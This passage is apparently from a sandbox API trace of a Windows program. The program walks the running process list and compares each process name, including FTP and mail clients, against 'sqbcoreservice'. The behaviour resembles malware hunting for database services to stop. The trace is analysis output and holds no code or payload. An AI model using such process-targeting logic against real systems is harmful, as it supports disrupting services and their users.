cchWideChar=-1, lpMultiByteStr=0x3575f00, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="registered try.exe", lpUsedDefaultChar=0x0) returned 19 [0096.210] lstrcpyA (in: lpString1=0x567fabc, lpString2="registered try.exe" | out: lpString1="registered try.exe") returned="registered try.exe" [0096.210] StrStrIA (lpFirst="registered try.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.210] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="consultancy statute ide.exe")) returned 1 [0096.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0096.212] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356b140 [0096.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="consultancy statute ide.exe", cchWideChar=-1, lpMultiByteStr=0x356b140, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="consultancy statute ide.exe", lpUsedDefaultChar=0x0) returned 28 [0096.212] lstrcpyA (in: lpString1=0x567fabc, lpString2="consultancy statute ide.exe" | out: lpString1="consultancy statute ide.exe") returned="consultancy statute ide.exe" [0096.212] StrStrIA (lpFirst="consultancy statute ide.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.212] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x67c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="invite.exe")) returned 1 [0096.213] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0096.213] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x3576cd0 [0096.213] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="invite.exe", cchWideChar=-1, lpMultiByteStr=0x3576cd0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="invite.exe", lpUsedDefaultChar=0x0) returned 11 [0096.213] lstrcpyA (in: lpString1=0x567fabc, lpString2="invite.exe" | out: lpString1="invite.exe") returned="invite.exe" [0096.213] StrStrIA (lpFirst="invite.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.213] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="idol.exe")) returned 1 [0096.214] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0096.214] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x3576ef8 [0096.214] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="idol.exe", cchWideChar=-1, lpMultiByteStr=0x3576ef8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="idol.exe", lpUsedDefaultChar=0x0) returned 9 [0096.214] lstrcpyA (in: lpString1=0x567fabc, lpString2="idol.exe" | out: lpString1="idol.exe") returned="idol.exe" [0096.214] StrStrIA (lpFirst="idol.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.214] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd5c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="latitude qualifications.exe")) returned 1 [0096.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0096.216] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356b2d0 [0096.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="latitude qualifications.exe", cchWideChar=-1, lpMultiByteStr=0x356b2d0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="latitude qualifications.exe", lpUsedDefaultChar=0x0) returned 28 [0096.216] lstrcpyA (in: lpString1=0x567fabc, lpString2="latitude qualifications.exe" | out: lpString1="latitude qualifications.exe") returned="latitude qualifications.exe" [0096.216] StrStrIA (lpFirst="latitude qualifications.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.216] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="lauderdaletransmittedwasher.exe")) returned 1 [0096.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0096.217] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x356b280 [0096.217] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="lauderdaletransmittedwasher.exe", cchWideChar=-1, lpMultiByteStr=0x356b280, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lauderdaletransmittedwasher.exe", lpUsedDefaultChar=0x0) returned 32 [0096.217] lstrcpyA (in: lpString1=0x567fabc, lpString2="lauderdaletransmittedwasher.exe" | out: lpString1="lauderdaletransmittedwasher.exe") returned="lauderdaletransmittedwasher.exe" [0096.217] StrStrIA (lpFirst="lauderdaletransmittedwasher.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.217] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="powell_jane.exe")) returned 1 [0096.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0096.218] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3576df0 [0096.218] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="powell_jane.exe", cchWideChar=-1, lpMultiByteStr=0x3576df0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="powell_jane.exe", lpUsedDefaultChar=0x0) returned 16 [0096.218] lstrcpyA (in: lpString1=0x567fabc, lpString2="powell_jane.exe" | out: lpString1="powell_jane.exe") returned="powell_jane.exe" [0096.218] StrStrIA (lpFirst="powell_jane.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.218] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="laboratorysaving.exe")) returned 1 [0096.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0096.220] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3575cc0 [0096.220] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="laboratorysaving.exe", cchWideChar=-1, lpMultiByteStr=0x3575cc0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="laboratorysaving.exe", lpUsedDefaultChar=0x0) returned 21 [0096.220] lstrcpyA (in: lpString1=0x567fabc, lpString2="laboratorysaving.exe" | out: lpString1="laboratorysaving.exe") returned="laboratorysaving.exe" [0096.220] StrStrIA (lpFirst="laboratorysaving.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.220] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x798, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gainedshape.exe")) returned 1 [0096.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0096.222] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x3576e08 [0096.222] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gainedshape.exe", cchWideChar=-1, lpMultiByteStr=0x3576e08, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gainedshape.exe", lpUsedDefaultChar=0x0) returned 16 [0096.222] lstrcpyA (in: lpString1=0x567fabc, lpString2="gainedshape.exe" | out: lpString1="gainedshape.exe") returned="gainedshape.exe" [0096.222] StrStrIA (lpFirst="gainedshape.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.222] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="opens-versions.exe")) returned 1 [0096.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0096.223] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3575d40 [0096.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="opens-versions.exe", cchWideChar=-1, lpMultiByteStr=0x3575d40, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opens-versions.exe", lpUsedDefaultChar=0x0) returned 19 [0096.223] lstrcpyA (in: lpString1=0x567fabc, lpString2="opens-versions.exe" | out: lpString1="opens-versions.exe") returned="opens-versions.exe" [0096.223] StrStrIA (lpFirst="opens-versions.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.223] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="workers_dedicated_alloy.exe")) returned 1 [0096.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0096.224] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x356b078 [0096.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="workers_dedicated_alloy.exe", cchWideChar=-1, lpMultiByteStr=0x356b078, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="workers_dedicated_alloy.exe", lpUsedDefaultChar=0x0) returned 28 [0096.225] lstrcpyA (in: lpString1=0x567fabc, lpString2="workers_dedicated_alloy.exe" | out: lpString1="workers_dedicated_alloy.exe") returned="workers_dedicated_alloy.exe" [0096.225] StrStrIA (lpFirst="workers_dedicated_alloy.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.225] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x29c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0096.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0096.226] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3576d48 [0096.226] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="3dftp.exe", cchWideChar=-1, lpMultiByteStr=0x3576d48, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="3dftp.exe", lpUsedDefaultChar=0x0) returned 10 [0096.226] lstrcpyA (in: lpString1=0x567fabc, lpString2="3dftp.exe" | out: lpString1="3dftp.exe") returned="3dftp.exe" [0096.226] StrStrIA (lpFirst="3dftp.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.226] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x888, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0096.227] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0096.227] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3575f40 [0096.227] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="absolutetelnet.exe", cchWideChar=-1, lpMultiByteStr=0x3575f40, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="absolutetelnet.exe", lpUsedDefaultChar=0x0) returned 19 [0096.227] lstrcpyA (in: lpString1=0x567fabc, lpString2="absolutetelnet.exe" | out: lpString1="absolutetelnet.exe") returned="absolutetelnet.exe" [0096.227] StrStrIA (lpFirst="absolutetelnet.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.227] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x564, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0096.228] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0096.228] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3576f10 [0096.228] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="alftp.exe", cchWideChar=-1, lpMultiByteStr=0x3576f10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="alftp.exe", lpUsedDefaultChar=0x0) returned 10 [0096.228] lstrcpyA (in: lpString1=0x567fabc, lpString2="alftp.exe" | out: lpString1="alftp.exe") returned="alftp.exe" [0096.229] StrStrIA (lpFirst="alftp.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.229] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0096.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0096.230] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3576e20 [0096.230] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="barca.exe", cchWideChar=-1, lpMultiByteStr=0x3576e20, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="barca.exe", lpUsedDefaultChar=0x0) returned 10 [0096.230] lstrcpyA (in: lpString1=0x567fabc, lpString2="barca.exe" | out: lpString1="barca.exe") returned="barca.exe" [0096.230] StrStrIA (lpFirst="barca.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.230] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe08, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0096.231] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.231] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3576f28 [0096.231] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="bitkinex.exe", cchWideChar=-1, lpMultiByteStr=0x3576f28, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bitkinex.exe", lpUsedDefaultChar=0x0) returned 13 [0096.231] lstrcpyA (in: lpString1=0x567fabc, lpString2="bitkinex.exe" | out: lpString1="bitkinex.exe") returned="bitkinex.exe" [0096.231] StrStrIA (lpFirst="bitkinex.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.232] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0096.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0096.233] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x3576f70 [0096.233] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="coreftp.exe", cchWideChar=-1, lpMultiByteStr=0x3576f70, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="coreftp.exe", lpUsedDefaultChar=0x0) returned 12 [0096.233] lstrcpyA (in: lpString1=0x567fabc, lpString2="coreftp.exe" | out: lpString1="coreftp.exe") returned="coreftp.exe" [0096.233] StrStrIA (lpFirst="coreftp.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.233] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0096.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0096.234] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x3574cf0 [0096.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="far.exe", cchWideChar=-1, lpMultiByteStr=0x3574cf0, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="far.exe", lpUsedDefaultChar=0x0) returned 8 [0096.235] lstrcpyA (in: lpString1=0x567fabc, lpString2="far.exe" | out: lpString1="far.exe") returned="far.exe" [0096.235] StrStrIA (lpFirst="far.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.235] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0096.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0096.236] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x3576d90 [0096.236] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="filezilla.exe", cchWideChar=-1, lpMultiByteStr=0x3576d90, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="filezilla.exe", lpUsedDefaultChar=0x0) returned 14 [0096.236] lstrcpyA (in: lpString1=0x567fabc, lpString2="filezilla.exe" | out: lpString1="filezilla.exe") returned="filezilla.exe" [0096.236] StrStrIA (lpFirst="filezilla.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.236] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0096.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0096.237] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x3576ca0 [0096.237] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="flashfxp.exe", cchWideChar=-1, lpMultiByteStr=0x3576ca0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="flashfxp.exe", lpUsedDefaultChar=0x0) returned 13 [0096.237] lstrcpyA (in: lpString1=0x567fabc, lpString2="flashfxp.exe" | out: lpString1="flashfxp.exe") returned="flashfxp.exe" [0096.237] StrStrIA (lpFirst="flashfxp.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.238] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0096.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0096.239] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x3576d00 [0096.239] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="fling.exe", cchWideChar=-1, lpMultiByteStr=0x3576d00, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="fling.exe", lpUsedDefaultChar=0x0) returned 10 [0096.239] lstrcpyA (in: lpString1=0x567fabc, lpString2="fling.exe" | out: lpString1="fling.exe") returned="fling.exe" [0096.239] StrStrIA (lpFirst="fling.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.239] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x394, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0096.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0096.240] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x3576000 [0096.240] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="foxmailincmail.exe", cchWideChar=-1, lpMultiByteStr=0x3576000, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="foxmailincmail.exe", lpUsedDefaultChar=0x0) returned 19 [0096.240] lstrcpyA (in: lpString1=0x567fabc, lpString2="foxmailincmail.exe" | out: lpString1="foxmailincmail.exe") returned="foxmailincmail.exe" [0096.240] StrStrIA (lpFirst="foxmailincmail.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.240] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0096.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0096.242] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x3576020 [0096.242] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x200, lpWideCharStr="gmailnotifierpro.exe", cchWideChar=-1, lpMultiByteStr=0x3576020, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gmailnotifierpro.exe", lpUsedDefaultChar=0x0) returned 21 [0096.242] lstrcpyA (in: lpString1=0x567fabc, lpString2="gmailnotifierpro.exe" | out: lpString1="gmailnotifierpro.exe") returned="gmailnotifierpro.exe" [0096.242] StrStrIA (lpFirst="gmailnotifierpro.exe", lpSrch="sqbcoreservice") returned 0x0 [0096.242] Process32NextW (in: hSnapshot=0x358, lppe=0x567f890 | out: lppe=0x567f890*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x560, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) 